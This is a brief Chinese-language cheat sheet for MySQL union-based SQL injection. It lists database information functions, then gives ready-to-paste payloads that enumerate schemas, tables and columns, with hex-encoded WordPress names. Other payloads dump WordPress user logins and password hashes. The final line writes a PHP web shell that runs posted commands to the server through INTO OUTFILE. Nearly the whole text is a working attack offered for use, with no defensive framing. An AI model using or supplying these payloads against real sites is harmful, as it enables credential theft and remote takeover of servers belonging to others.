PHP内置函数:
1:system_user() 系统用户名
2:user() 用户名
3:current_user 当前用户名
4:session_user()连接数据库的用户名
5:database() 数据库名
6:version() MYSQL数据库版本
7:load_file() MYSQL读取本地文件的函数
8:@@datadir 读取数据库路径
9:@@basedir MYSQL
安装路径
10:@@version_compile_os 操作系统
===========================================================================
爆信息:and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
============================================================================
1,爆库
and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --
2,爆表
and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--
3,爆字段
and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--
4,爆密码
and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--
=============================================================================
load_file()
select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'